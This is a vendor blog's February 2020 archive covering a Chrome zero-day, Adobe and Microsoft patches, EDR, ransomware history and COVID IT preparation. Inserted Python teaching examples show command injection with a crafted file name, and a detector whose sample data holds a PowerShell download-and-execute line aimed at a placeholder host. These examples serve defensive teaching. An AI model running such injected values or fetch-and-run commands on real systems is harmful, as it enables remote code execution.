Monthly Archives

February 2020


Google Chrome Zero-Day Vulnerability Under Attack

Category: Patch Management


Google has patched a Chrome browser zero-day bug being actively exploited in the wild. The vulnerability affects installations of Chrome running on Windows, Linux, and macOS.

Chrome Under Active Attack


The zero-day, tracked as CVE-2020-6418, is a type confusion bug in V8, the open-source JavaScript engine used by the browser. Google credited Clement Lecigne of its Threat Analysis Group with reporting the vulnerability; Lecigne has reported several Chrome and Internet Explorer vulnerabilities over the past year.

Government Says Update Chrome

The Cybersecurity and Infrastructure Security Agency (CISA) also posted a bulletin encouraging users and administrators to review the Chrome release notes and “apply the necessary updates.”

Technical details of the vulnerability are being withheld until the patch has reached a majority of users, according to Google. A type confusion bug occurs when code accesses an object as if it were of a different type than the one it was created with; in a JIT-compiled engine such as V8 this typically yields out-of-bounds reads or writes, which an attacker who can get a victim to load a crafted web page can often turn into arbitrary code execution in the renderer process.

Google Warns of More Vulnerabilities

Google has also warned users of two additional high-severity vulnerabilities. The first (CVE-2020-6407) is an out-of-bounds memory access in streams; the second (CVE not assigned at the time of the release) is an integer overflow in ICU, the Unicode library used by the browser. Bugs of that kind commonly cause a denial of service and can sometimes be escalated to code execution.

This is the third Chrome zero-day exploited in the wild within roughly a year. Google patched the first in March 2019 (CVE-2019-5786) and the second in November 2019 (CVE-2019-13720).

The fix for this zero-day shipped in Chrome version 80.0.3987.122.

How to Manage Chrome Vulnerabilities

Leveraging a simple and powerful solution with an up-to-date library of third-party products could easily alleviate the issue across organizations. Syxsense provides Chrome updates same-day and allows for an exceptionally smooth process with a Patch Deploy task.

Simply target all devices for the newest update and the pre-packaged detection will determine if devices do/do not require the update. If they require it, the update will be automatically applied and the vulnerability remediated.

Experience the Power of Syxsense

Syxsense has created innovative and intuitive technology that sees and knows everything. Manage and secure your environment with a simple and powerful solution.

Schedule Your Syxsense Demo

Syxsense combines IT management, patch management, and security vulnerability scanning in one powerful solution. Get started today.

Schedule My Demo

5 Steps to Prepare Your IT Department for Coronavirus

Category: Blog

5 Steps Every IT Department Should Take to Prepare for Coronavirus (COVID-19)

Coronavirus is impacting businesses worldwide. Here are the steps every CIO and IT department should take to prepare their businesses.

Coronavirus is Here to Stay

According to major news outlets, Americans need to prepare for the imminent spread of Coronavirus. Dr. Nancy Messonnier, director of the CDC’s National Center for Immunization and Respiratory Diseases, stated: “It’s not so much a question of if this will happen anymore, but more really a question of when it will happen — and how many people in this country will have severe illness.”

As seen in China, Coronavirus (COVID-19) is impacting businesses worldwide. We can expect a similar impact across the United States and Europe in the coming months.

How will Coronavirus change the way our business works?

We expect much greater use of remote meeting technologies like Zoom. This allows workers to avoid travel and decrease contact within the office, reducing close person-to-person contact in meeting rooms.

Additionally, we expect an increase in teleworking. Person-to-person infections can be greatly reduced by employees working from home. As seen in Asia, and now Europe, self-quarantine rules will likely be implemented. Teleworking will allow employees who are not sick to still be productive from home.

How Your IT Department Should Prepare

  1. Install office hand sanitizer stations. This simple step is one of the most effective methods to prevent transmission.
  2. Implement remote support tools. This allows your support team to remote control devices within your network to reduce or eliminate desk-side visits.
  3. Order hardware supplies. Desktops, laptops, servers, and spare parts should be ordered now. Most hardware is manufactured in Asia and supply chains are already being impacted. Organizations should be purchasing three months of equipment needs.
  4. Prepare for teleworking. What hardware, software and other tools are required for teleworking?
  5. Select the right tool. Does your IT management tool support teleworking? Can you manage devices outside the corporate network? Can devices at home access the corporate data you will need? Will you ensure large numbers of highly distributed devices are patched and secured without them coming into the office?

Start your organization’s journey toward simple and powerful endpoint security with a free trial of our products and services.


Is There a Patching Alternative to WSUS?

Category: Patch Management


Still using WSUS for patch management? There might be a better strategy for efficiently protecting and managing your business.

Still Using WSUS?

Tired of scouring through forums to figure out why WSUS isn’t installing updates? Do you keep getting errors even though you followed every step perfectly?

While WSUS is a free update tool, it is limited: it offers only basic reporting on which updates were approved and installed where, and it has no way to deploy non-Microsoft updates.

Why You Should Pay for an IT Management Solution

While WSUS might come with Windows, it is certainly not free. There are hidden expenses to consider. Looking at the number of hours wasted, and additional software needed to fully manage your environment, WSUS comes out as more expensive than any paid-for IT management software.

Spending so many resources on only updating your Windows OS is a dramatic waste of the time your IT team could spend on more critical or interesting projects.

Implementing a solution such as Syxsense will simplify your deployment process. From a single browser, Syxsense can manage PCs, Macs, and Linux devices, both inside and outside the network. You can also deploy third-party software, track task status, generate reports, and more. You can patch everything, everywhere, all from the cloud.

The Syxsense Advantage

Syxsense allows you to:

  • See your full inventory and vulnerability status
  • Prioritize and deploy patches based upon severity
  • Start patching endpoints within minutes

Syxsense Manage and Syxsense Secure can easily resolve vulnerabilities across your entire environment. Find peace of mind by trusting Syxsense and set up a free trial today.


Why You Should Combine Your IT Management and Security Operations Strategy

Category: Patch Management


The current IT security landscape is changing dramatically. How will the shift to endpoint detection and response (EDR) change your strategy?

How IT Security is Changing

Companies initially put up firewalls and installed antivirus software to prevent security breaches. But it wasn’t long before ransomware came along and shattered the status quo, shifting the focus to endpoint detection and response (EDR).

With that, the market for endpoint-security software exploded.

However, organizations are forced to cobble together a variety of barely compatible vendors to meet all of their cybersecurity needs: multiple solutions, each with its own infrastructure, deployment process, training, and ongoing management. With costs skyrocketing, one thing has become crystal clear: companies want an option that combines systems management tools, EDR, and vulnerability/threat management in a single, seamless platform.

Being in the vanguard of systems and patch management, Syxsense is the first to combine endpoint management and security that provides greater efficiency between IT management and security teams. In today’s rapidly changing digital landscape, Syxsense is at the forefront of a security revolution.

With AI-driven threat protection, Syxsense enables customers to have a “sixth sense” for security vulnerabilities and breaches. That is the power of complete endpoint visibility and predictive technology.

The Current Security Landscape

A recent article by Enterprise Strategy Group (ESG) confirms this scenario: “ESG research shows that 77% of companies surveyed plan to move to an integrated security suite with a preference towards a single vendor, with an even split between companies who are looking to next-gen providers and those looking to the large, established security players.”

While security vendors continue to increase the efficacy of their preventative solutions, security users are demanding simplification in the security stack, wanting to work with fewer tools and vendors. ESG concluded that “this means that organizations will need to depend on today’s tools providers to bring together at least the core prevention, detection, and response capabilities, in addition to managed services to assist in the implementation and management of these functions.”

The Syxsense Advantage

Our strategy is to simplify technology, which includes the consolidation of siloed endpoint security tools into a single agent for centralized security functions; merging of endpoint protection platforms (EPP) and EDR; and combining pre-execution prevention, post-execution detection, and response/remediation.

Syxsense believes the time is right to include endpoint management in the EPP/EDR mix. This creates an opportunity for consolidated technology that unifies the essential pieces across all three functions for greater efficiency, collaboration, and reduced costs—especially for SMB and mid-market enterprises.

Cyber criminals never stop working, and neither does Syxsense. We will help you secure your network from criminals who never give up on finding new ways to steal your company’s data and cripple your business. That’s why we’ve created an end-to-end solution that combats security threats, start to finish. Built for businesses that have limited resources but still need innovative security technology, Syxsense has brought together all of the essential components required to secure your enterprise quickly and easily—today.

Until now, what this all meant to the IT and security teams looking to stay on top of things was chaos in the market for security software.

Simplifying Endpoint Security

Syxsense has done everything it can to end this chaos and simplify endpoint security in the 2020s. New endpoint types, such as Internet of Things (IoT), workforce trends such as Bring Your Own Device (BYOD), and operating system and software vulnerabilities that require countless patches across increasingly complex networks, make endpoint management a real slog.

Endpoint management challenges increase the risk for exposure to threats. If businesses fail at endpoint management, they will fall victim to a security breach that could have been avoided.


Adobe Patches Released for New Critical Flaws

Category: Patch Management


Adobe has released dozens of critical patches this week, addressing 42 separate CVEs in its regularly scheduled February updates.

Adobe Puts Out Dozens of Patches

Adobe has released dozens of patches this week, addressing 42 separate CVEs in its regularly scheduled February updates, with 35 of the flaws rated as Critical severity.

The release covers five widely used Adobe products:

  • Adobe Acrobat and Reader
  • Adobe Digital Editions
  • Adobe Experience Manager
  • Adobe Flash Player
  • Adobe Framemaker

“This update addresses multiple critical vulnerabilities,” Adobe stated in its security bulletin. “Successful exploitation could lead to arbitrary code execution in the context of the current user.”

Fixing Framemaker

The majority of the fixes (21) impact Adobe Framemaker, a document processor designed for writing and editing large or complex documents, according to a security advisory published on Tuesday.

The Framemaker flaws include buffer errors, heap overflow problems, out-of-bounds write, and memory corruption issues; any of which can lead to the execution of arbitrary code. Adobe Framemaker versions 2019.0.4 and below (for Windows) are affected and thus a patch has been published for version 2019.0.5.

Exploring the Vulnerabilities

Adobe Acrobat and Reader for Windows and macOS also contain 12 similar code execution vulnerabilities. These vulnerabilities include heap overflow, buffer errors, use-after-free flaws, and privilege escalation bugs.

Just like the Framemaker bugs, these can lead to arbitrary code execution and arbitrary file system writes if exploited. Adobe also remediated 3 important out-of-bounds read issues leading to information disclosure and 2 moderate stack exhaustion vulnerabilities that could be exploited to cause memory leaks.

The latest update for Adobe Flash Player, potentially one of the most infamous applications in terms of having a horrible security record, has a critical arbitrary code execution flaw. If exploited, the flaw could allow hackers to compromise targeted Windows, macOS, Linux, and Chrome OS-based devices.

Adobe Digital Editions, an eBook reader application, also has a critical and an important flaw in versions 4.5.10 and below. The critical flaw stems from a command injection vulnerability (CVE-2020-3760) allowing potential arbitrary code execution. Command injection is possible whenever an application passes unsanitized user-supplied data (such as form fields, file names, or HTTP headers) to a system shell, where characters like ; or | are interpreted as command separators rather than as part of the data.
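The mechanism described above, as an added example that is not code from Adobe or Syxsense: a harmless `echo` stands in for the real program (for instance an eBook converter), and the injected file name is constructed for the demo. The vulnerable variant builds a shell string; the two hardened variants either quote the input as a single shell word or skip the shell entirely, and an allowlist check rejects anything that is not a plain file name.

```python
"""Command injection: vulnerable shell string vs. hardened argv call.

Added example, not Adobe's or Syxsense's code. 'echo' stands in for the
real program so the injected command only prints a marker."""
import re
import shlex
import subprocess

# Attacker-controlled value, constructed for the demo: a file name that
# closes the intended command with ';' and appends one of its own.
INJECTED_NAME = "book.epub; echo INJECTED"

# Allowlist for a plain file name: letters, digits, dot, dash, underscore.
SAFE_NAME = re.compile(r"^[A-Za-z0-9._-]{1,255}$")


def convert_vulnerable(filename: str) -> str:
    """Interpolates untrusted input into a shell command line (the bug)."""
    cmd = f"echo converting {filename}"
    return subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout


def convert_quoted(filename: str) -> str:
    """Still uses the shell, but shlex.quote() turns the input into one word."""
    cmd = f"echo converting {shlex.quote(filename)}"
    return subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout


def convert_argv(filename: str) -> str:
    """No shell at all: the input is a single argv element, never parsed as syntax."""
    return subprocess.run(
        ["echo", "converting", filename], capture_output=True, text=True
    ).stdout


def is_safe_name(filename: str) -> bool:
    """Defense in depth: reject anything that is not a plain file name."""
    return bool(SAFE_NAME.match(filename))


if __name__ == "__main__":
    print("vulnerable:", repr(convert_vulnerable(INJECTED_NAME)))
    print("quoted:    ", repr(convert_quoted(INJECTED_NAME)))
    print("argv:      ", repr(convert_argv(INJECTED_NAME)))
    print("allowlist: ", is_safe_name(INJECTED_NAME))
```

The vulnerable call prints two lines, because the shell ran `echo INJECTED` as a second command; both hardened calls print the whole file name, semicolon included, as data. Prefer the argv form wherever possible and keep the allowlist as a second layer.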

Last, but possibly least, Adobe Experience Manager, Adobe’s content management solution, has an important-level uncontrolled resource consumption vulnerability (CVE-2020-3741) that could result in a denial-of-service condition.

Patching the Problems

Though none of the software vulnerabilities resolved this month were publicly disclosed or appear to have been exploited in the wild, all of the products mentioned above should be patched as soon as possible.
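The "does this host still need the update?" decision that both the Chrome post above (fixed in 80.0.3987.122) and this Adobe post (Framemaker 2019.0.4 and below, Digital Editions 4.5.10 and below) come down to is a version comparison, and the classic mistake is comparing version strings as text. This added example, which is not Syxsense's detection logic, compares dotted versions numerically; the host inventory is constructed for the demo.

```python
"""Numeric version comparison for the 'does this host need the patch?' check.

Added example, not Syxsense's detection logic. The fixed / last-affected
versions are the ones stated in the Chrome and Adobe posts; the inventory
is constructed for the demo."""
import re

# rule "fixed_in":          installed <  version  => vulnerable
# rule "affected_through":  installed <= version  => vulnerable
ADVISORIES = {
    "Google Chrome": ("fixed_in", "80.0.3987.122"),        # CVE-2020-6418
    "Adobe FrameMaker": ("affected_through", "2019.0.4"),  # fix is 2019.0.5
    "Adobe Digital Editions": ("affected_through", "4.5.10"),
}

# Constructed inventory: (host, product, installed version)
INVENTORY = [
    ("ws01", "Google Chrome", "80.0.3987.87"),
    ("ws02", "Google Chrome", "80.0.3987.122"),
    ("ws03", "Google Chrome", "81.0.4044.6"),
    ("ws04", "Adobe FrameMaker", "2019.0.4"),
    ("ws05", "Adobe FrameMaker", "2019.0.5"),
    ("ws06", "Adobe Digital Editions", "4.5.10"),
    ("ws07", "Adobe Digital Editions", "4.5.11"),
]


def parse_version(text: str) -> tuple:
    """'80.0.3987.122' -> (80, 0, 3987, 122); tolerates stray prefixes/suffixes."""
    parts = re.findall(r"\d+", text)
    if not parts:
        raise ValueError(f"no numeric components in {text!r}")
    return tuple(int(p) for p in parts)


def compare(a: str, b: str) -> int:
    """-1, 0 or 1; pads the shorter tuple with zeros so that 4.5 == 4.5.0."""
    va, vb = parse_version(a), parse_version(b)
    n = max(len(va), len(vb))
    va += (0,) * (n - len(va))
    vb += (0,) * (n - len(vb))
    return (va > vb) - (va < vb)


def needs_patch(product: str, installed: str) -> bool:
    rule, version = ADVISORIES[product]
    c = compare(installed, version)
    return c < 0 if rule == "fixed_in" else c <= 0


def triage(inventory):
    """Return every (host, product, installed) row that is still exposed."""
    return [row for row in inventory if needs_patch(row[1], row[2])]


if __name__ == "__main__":
    for host, product, ver in triage(INVENTORY):
        print(f"{host}: {product} {ver} needs update")
```

Note that a plain string comparison ranks "80.0.3987.87" above "80.0.3987.122" (because "8" sorts after "1"), which would mark an unpatched Chrome as up to date; the numeric comparison gets it right.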

For a “one-stop-shop” with vulnerability scanning, patch management and endpoint detection and response in one package, look no further than Syxsense Secure. Available as a standalone software product or alongside 24/7 managed services from our dedicated, experienced team.

The similarly comprehensive Syxsense Manage solution offers additional endpoint, OS and patch management, oversight to complete the picture of meticulous and wide-ranging threat management.

Begin your organization’s journey toward airtight endpoint security with a free trial of Syxsense’s products and services.


Microsoft’s February 2020 Patch Tuesday Fixes 99 Security Issues

Categories: Patch Management, Patch Tuesday


The official Patch Tuesday updates have arrived for February, including 99 vulnerability fixes. Catch up on the latest news from Microsoft and start patching.

February Patch Tuesday is Here

Microsoft has released 99 patches today: 12 are rated Critical and the remainder Important.

Support for Windows 7 and Windows Server 2008 (including R2) was officially ended last month, but there are plenty of updates released this month for customers who have purchased an extension agreement.

Zero Day Weaponized Bug for IE

CVE-2020-0674, which carries a Critical vendor severity and a High CVSS score, is a memory corruption bug in the scripting engine used by Internet Explorer. It has been publicly disclosed and is being exploited in the wild.

This is as close to a zero-day as you can get, and we encourage everyone still using Internet Explorer to update as soon as possible. The vulnerability affects Windows 7, whose support officially ended last month, as well as Windows 10 and Windows Server 2008 through 2012.

Robert Brown, Director of Services for Syxsense said, “If you are still using Internet Explorer on Windows 7 and have not purchased the CSA / ESU extension, you may wish to consider uninstalling IE and replacing it with another browser immediately due to the critical nature of this vulnerability. It has huge potential to be used to install Ransomware or other software simply by accessing an infected website. Customers using Syxsense Manage or Syxsense Secure will be able to deploy all new Windows 7 content to your licensed Windows 7 systems.”

Microsoft had earlier published a security advisory for this IE code-execution vulnerability while it was still unpatched; this month’s update resolves it.

Another Adobe Headache

Adobe released fixes for 42 CVEs today, the largest batch of the year so far, covering Framemaker, Experience Manager, Digital Editions, Flash Player, and Acrobat and Reader. Both Syxsense and Adobe recommend that these Critical updates be deployed within the next 7 days.


Endpoint Security vs. Antivirus

Category: Patch Management

Antivirus Software is Nice, But It’s Not Enough for Full Endpoint Security

Are your current security measures enough to protect your network’s endpoints? Explore the key differences between antivirus software and EDR tools.

As we previously pointed out in our “Endpoint Security 2020: What You Need to Know” article: “Cyberattacks are growing more complex and difficult to prevent, and this will only accelerate in the future, thus making endpoint security a top goal in 2020.” Given the news of late, there can be no doubting the importance of this.

You probably already have information-security measures in place in your organization, such as firewalls and antivirus software. But you might be wondering if what you have in place is sufficient to properly protect all of your network’s endpoints.

Unfortunately, the question, and the answers, might not be that simple. As SolutionsReview points out, it’s important to understand the historical significance of antivirus software. Such tools, whose origins date back more than 30 years, are the wellspring from which other, more sophisticated cybersecurity tools and techniques would emerge.

The late 1980s and early 1990s marked the debut of antivirus products from developers such as Symantec, McAfee and Sophos, in addition to the founding of cybersecurity research groups such as the Computer Antivirus Research Organization.

Now, three decades later, antivirus tools are part of standard operating procedure for virtually all professional-grade desktops and laptops—as well as a considerable number of the smartphones and tablets used by enterprise staff. Plenty of consumers also use such applications.

The Inherent Limits of Antivirus Control

In the majority of cases, antivirus software runs in the background and only shows itself when a threat is detected. While certainly valuable, it has a clear limitation: it acts only once something has already been recognized as a threat. It offers little in the way of investigation or response tooling, nor the broader scope of functionality available through endpoint detection and response (EDR) tools.

Additionally, many legacy antivirus programs, and even some recent ones, are limited to signature-based detection: they match files against patterns derived from previously analysed malware samples. An up-to-date antivirus platform will recognise many of the well-known malware and exploit tools used by modern attackers, but plenty of samples have not had signatures written for them yet, and malware that is repacked or regenerated for each victim, so that no static signature matches, is becoming increasingly common, according to TechTarget.

Perhaps most alarming of all is that many cyberattacks today eschew files entirely. Instead, they use innocuous-looking links or documents to abuse legitimate, already-installed programs such as Flash or Windows PowerShell; the latter can download and execute attacker-supplied script straight from memory, leaving nothing on disk for a file scanner to inspect.

As CSO explained, these collect data from the victimized machine and relay it to the hacker who originated the attack, allowing that interloper to seize further control of a device and subsequently deliver more exploits. An entire network could be devastated this way, and many antivirus tools would most likely have never seen it coming.

The Ponemon Institute’s 2018 State of Endpoint Security Report noted that 35% of that year’s malware attacks were fileless, while projecting that figure to increase to 38% for 2019. In the years to come, it’s entirely possible that fileless exploits will constitute a significant majority of the cyberattacks deployed against all businesses and public-sector organizations, leaving antivirus tools even more in the lurch.

Moving Ahead to Endpoint Protection

Back in 2015, in a guest blog post for Politico, engineer and futurist David Evans estimated that about 127 new endpoints were being added to the internet of things every second, all over the world. More recently, Gartner projected that IoT growth had reached the point at which there would be approximately 5.8 billion endpoints in the global enterprise and automotive markets alone by the end of 2020, marking 21% growth from the previous year.

According to the SANS study “Understanding the (True) Cost of Endpoint Management,” 61% of the respondents said their organizations had more than 1,000 user endpoints, while 5% claimed to have 100,000 or more. And the risk to small businesses is no less real and significant than that facing medium-sized and enterprise-level companies. Per Verizon’s Mobile Security Index 2019, 88% of firms with 500 or fewer workers acknowledged that endpoint security threats were a serious hazard to their operations and expected the problem to get worse.

EDR to the Rescue

EDR solutions emerged to address the security issues created by the increase in endpoints, IoT-related or not, and are typically delivered as software-as-a-service. Rather than only scanning the network and its interconnected devices for known malware signatures, EDR tools monitor process and user behaviour, looking for actions and operations that are out of the ordinary. This is sometimes referred to as “suspicious activity validation.”

The best EDR tools perform all of the classic functions of their cybersecurity predecessors, but leverage new methods to do so, including the use of artificial intelligence and machine learning. Furthermore, they are not limited to checking for conventional signatures to look for signs of potential malware intrusions; they also examine URLs, IP addresses, file hashes, and other data points.
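What "monitoring behaviour" looks like in practice, for the fileless PowerShell scenario described earlier in this article and the hash/URL checks mentioned just above, as an added example that is not Syxsense's detection engine: three rules run over constructed process-creation events (an Office application spawning a script host, a base64 `-EncodedCommand`, and a download cradle hidden inside it), plus a lookup against a constructed bad-hash list. The host names, hashes, the URL and the rule names are all illustrative.

```python
"""Behavioural detection over process-creation events, the kind of check an
EDR applies instead of (or on top of) file signatures.

Added example, not Syxsense's detection engine. Events, hashes and the URL
are constructed for the demo."""
import base64
import re
from dataclasses import dataclass
from typing import List, Optional

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
# Constructed IOC list standing in for a threat-intel hash feed.
KNOWN_BAD_SHA256 = {"c3ab8ff13720e8ad9047dd39466b3c8974e592c2fa383d4a3960714caef0c4f2"}

DOWNLOAD_CRADLE = re.compile(
    r"Invoke-WebRequest|Net\.WebClient|DownloadString|DownloadFile|Invoke-Expression|\bIEX\b",
    re.IGNORECASE,
)
# -e / -ec / -enc / -EncodedCommand followed by a base64 blob
ENCODED_ARG = re.compile(r"-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]{16,})", re.IGNORECASE)


@dataclass
class ProcEvent:
    host: str
    parent_image: str
    image: str
    command_line: str
    sha256: str


def decode_encoded_command(command_line: str) -> Optional[str]:
    """PowerShell -EncodedCommand carries base64 of UTF-16LE text; recover it."""
    m = ENCODED_ARG.search(command_line)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze(ev: ProcEvent) -> List[str]:
    """Return the name of every rule the event trips (empty list = clean)."""
    findings = []
    if ev.parent_image.lower() in OFFICE_APPS and ev.image.lower() in SCRIPT_HOSTS:
        findings.append("office-spawned-script-host")
    decoded = decode_encoded_command(ev.command_line)
    if decoded is not None:
        findings.append("encoded-command")
    # Look for the cradle in both the visible and the decoded command line.
    if DOWNLOAD_CRADLE.search(ev.command_line) or (decoded and DOWNLOAD_CRADLE.search(decoded)):
        findings.append("download-cradle")
    if ev.sha256.lower() in KNOWN_BAD_SHA256:
        findings.append("known-bad-hash")
    return findings


# --- constructed sample telemetry ---------------------------------------
PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a.ps1')"
ENCODED = base64.b64encode(PAYLOAD.encode("utf-16le")).decode("ascii")

EVENTS = [
    ProcEvent("ws01", "explorer.exe", "powershell.exe",
              "powershell.exe -NoProfile -File C:\\scripts\\inventory.ps1", "1" * 64),
    ProcEvent("ws02", "WINWORD.EXE", "powershell.exe",
              f"powershell.exe -NoP -W Hidden -Enc {ENCODED}", "2" * 64),
    ProcEvent("ws03", "cmd.exe", "mshta.exe",
              "mshta.exe C:\\Users\\Public\\update.hta",
              "c3ab8ff13720e8ad9047dd39466b3c8974e592c2fa383d4a3960714caef0c4f2"),
]


def alerts(events: List[ProcEvent]) -> dict:
    """host -> findings, for hosts with at least one finding."""
    return {ev.host: analyze(ev) for ev in events if analyze(ev)}


if __name__ == "__main__":
    for host, hits in alerts(EVENTS).items():
        print(host, hits)
```

The benign admin script on ws01 produces no findings even though it is also PowerShell; the Word-spawned, encoded, downloading PowerShell on ws02 trips three rules at once, which is what makes behavioural scoring useful against fileless tradecraft that a file-signature scanner never sees.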

How EDR from Syxsense Keeps you Protected

Cyber-attackers are not exactly the kind of folks who will limit their intrusions to business hours. Whatever they are up to—from monetary gain to state-sponsored intrusion—bad actors are always on the lookout for weak spots to take advantage of. IoT endpoints are among their favorites. Your organization deserves an EDR solution that is as constantly active—and aggressive—as cybercriminals are.

Syxsense Secure and Manage both provide enterprise users with the sort of always-on protection that is necessary to mitigate the broad spectrum of cybersecurity threats out there today. By allowing for comprehensive and real-time visibility into all endpoint activity, reporting on device inventory, quickly quarantining detected threats, and automatically patching all of your devices—be they Windows, Mac, or Linux—Syxsense solutions represent an efficient and meticulous approach to information-security needs.


Why Endpoint Detection and Response is Getting Harder in 2020

Category: Patch Management


As the severity of cyberthreats increases, the demand for endpoint detection and response solutions across the globe is growing.

The demand for endpoint detection and response solutions across the globe is currently quite strong, with no signs of slowdown any time soon: Recent research by London-based firm Technavio predicts that the market for this type of cybersecurity software will grow by $7.67 billion between 2020 and 2024, representing a compound annual growth rate of 10%.

Why such robust growth in this space? The answer is both simple and unfortunately discomforting. It’s becoming more difficult for businesses, government departments and other organizations to feel secure with the endpoint protections they have in place.

No wonder, given that the severity (and sheer number) of cyberthreats out there is constantly growing. Today, we’ll take a look at what challenges organizations aiming to bolster the effectiveness of their information security may face — and how they might be able to overcome such hurdles.

More Devices = More Potential Weaknesses

Analysis from the researchers at Gartner projected in August 2019 that there would be 5.8 billion enterprise and automotive IoT endpoints in use around the world by the end of the following year, a 21% uptick from 2019’s number.

There’s no denying the utility and communicability that the IoT fosters for so many, but while marveling at those positive attributes you must also note the risks it poses. As the number of endpoints increases across your network — both inside and outside of the IoT realm — so do the potential points of weakness.

In fact, Infosecurity magazine reported in October 2019 that there had been more than 100 million attacks on IoT-connected devices in the first half of that year. Applications run on such devices can be particularly vulnerable.

According to TechRadar, facing up to the security threat represented by IoT device proliferation requires use of an endpoint security solution that can offer comprehensive visibility of all internal and external vulnerabilities. This vigilance must be constant and in real time.

Mounting Danger of New and Established Cyberthreats

IoT-focused cyberattacks, while relatively new in the cyberthreat landscape, have already done plenty of damage, with Wired citing the Mirai and Reaper botnet attacks of 2016 and 2017, respectively, as major examples of such malicious campaigns. The latter of those infected more than 1 million networks. New versions of the threats coming through IoT endpoints will be able to do even more damage, most visibly as large distributed denial-of-service (DDoS) attacks.

Other, more established attack styles like phishing are becoming more dangerous in similar ways, according to Security Boulevard. Malicious actors have diversified their techniques so that these social engineering scams are no longer confined to relatively easy-to-detect emails: they can be delivered via text messages and even phone calls. AI plays a significant role here, as attackers use it to mimic an organization’s in-house jargon and speech and thus make phishing harder to spot.

Last but not least, ransomware looks to pose a graver threat than ever before. The extortionists using this malware saw plenty of success in 2019, attacking local governments all over the U.S., including Baltimore and New Orleans, following the 2018 attack on Atlanta.

In one particularly brazen, widespread attack, hackers simultaneously hit the municipal networks of 22 Texas cities and towns, disabling countless web-based civic services and operations.

Although not all of those attacks netted hackers the ransom sums they demanded, the disturbing effectiveness of such efforts has likely emboldened cyber attackers, so bigger and more devastating ransomware campaigns are surely on the horizon for 2020. The same is almost certainly true for IoT-based and social engineering attacks. Only the strongest, most versatile threat detection and response solutions will be capable of meeting major cyberthreats head-on, be they new attack types or updated versions of old standbys.

The Need for Quicker Responses to Threats

Opinions vary on how long it takes cyber attackers to breach a target they have picked. Some say it falls between 10 and 15 hours, while others consider it more a matter of minutes, according to TechTarget. Either way, that’s an effectively minuscule time frame.

In an interview with Dark Reading, Dan Basile, executive director of security operations at Texas A&M University, noted that while it’s ideal to find cyberthreats before they can do any harm, like removing a tumor before cancer metastasizes uncontrollably, this perfect-world plan of action isn’t always possible. Therefore the focus switches to quickly directing infosec defenses at a detected threat before permanent damage occurs. EDR needs to be a part of a quick-response strategy, along with application firewalls, network traffic analysis and other systems.

EDR Can’t Do It Alone

That last sentence in the section above represents another key point: EDR becomes (and will continue to become) more difficult to rely on if you expect it to carry the weight of all infosec responsibilities on its own. It must be deployed in concert with firewalls, encryption, multi-factor authentication, threat hunting and other tools. The support of an organizational culture aware of and focused on the gravity of contemporary cybersecurity threats is also essential.

Choosing Syxsense as your EDR solution gives your business a considerable head start on the journey to crafting a reliably secure environment for your digital assets. Coupled with our comprehensive managed IT and patch management services, Syxsense can provide your organization the peace of mind it deserves. Contact us today to learn more or sign up for a free trial.

Experience the Power of Syxsense

Syxsense has created innovative and intuitive technology that sees and knows everything. Manage and secure your environment with a simple and powerful solution.

Syxsense demo

Schedule Your Syxsense Demo

Syxsense combines IT management, patch management, and security vulnerability scanning in one powerful solution. Get started today.

Schedule My Demo

How Deadly is Ransomware?

By Patch Management

How Deadly is Ransomware and How Effective are the Protections Against It?

Organizations of all kinds have found themselves victims to ransomware. Find out how dangerous these attacks are and explore strategies to protect your business.

Picture the following scenario for a moment: It’s a seemingly typical day at the office for your business. People are busy and coffee-driven. Everything is unfolding as it should — or at least as it usually does.

Then, in the space of just a few seconds, everything changes: a ransomware attack begins.

Maybe it’s your client database — including all of the financial and personal information you’ve collected in the partnership process — that suddenly becomes inaccessible. Perhaps key files are abruptly encrypted in a way that you’ve never seen before. Or maybe systems grind to a halt and won’t function. You see a message telling you, in so many words, to pay up or lose the data (or remain locked out of your mission-critical networks and devices). It’s a simple — and often successful — exploit tactic.

No matter how the incident specifically unfolds, whether you pay up or work around it, you’ll likely always divide your job, to some extent, into pre- and post-ransomware periods. Here, we’re going to take a deep dive into the ins and outs of ransomware, and examine how effective various tools — ranging from staff training to endpoint detection and response solutions — can be in mitigating the damage that this increasingly common cyberattack type can do.

A Brief History of Ransomware

According to a 2012 piece from TechRepublic, ransomware dates back to the late 1980s, though it was not widely used during that decade. It became somewhat prominent among hackers and cyberattackers in the mid-2000s, and about a decade after that, it began to take the forms that IT and information security team members are familiar with today.

To date, the most famous ransomware attack — and certainly the most impactful in terms of the sheer number of those who were victimized by it — is 2017’s WannaCry. This particular act of extortion involved a viral exploit known as EternalBlue, which attacked Microsoft operating systems that hadn’t been patched for a vulnerability in the Server Message Block file-sharing protocol.

Gizmodo noted that the attack, based on a self-propagating cyber warfare tool originally developed by the National Security Agency and hijacked by the ShadowBrokers hacker group, spread quickly to every device on every network it reached and at random across the internet.

WannaCry-infected machines saw their data encrypted and received demands for $300 ransom payments into bitcoin wallets in exchange for decryption. The ransomware spread to as many as 200,000 computers across 150 countries before white-hat hackers began distributing decryption keys; its makers received almost $130,000 for their efforts.

Also, although the Department of Justice would ultimately charge a North Korean hacker, Park Jin-hyok, with deployment of WannaCry and various other cyberattacks, The New York Times pointed out Park would likely never stand trial for these alleged offenses due to poor U.S.-North Korean diplomatic relations.

Anatomy of a Typical Ransomware Attack

Social engineering strategies like phishing or spear-phishing are perhaps the most common delivery system for ransomware attacks, especially in organizational networks:

  • An employee receives an email purporting to be from a manager or co-worker, urging them to click on a link or attachment.
  • When they do, malware takes over targeted systems, either encrypting files or preventing access.
  • A ransom-demand message is then delivered, sometimes with a deadline. Bitcoin wallets are the typical method of payment requested by attackers, because transactions on their decentralized ledgers are easy to find while the wallet owners remain virtually untraceable.

Existing vulnerabilities, like the Windows flaw that allowed WannaCry just enough room to sneak into so many machines, are another common entry point for ransomware scams. Intrusion through the internet of things is also entirely feasible, especially, as CSO noted, in the case of botnets that have seized control of dozens of devices.

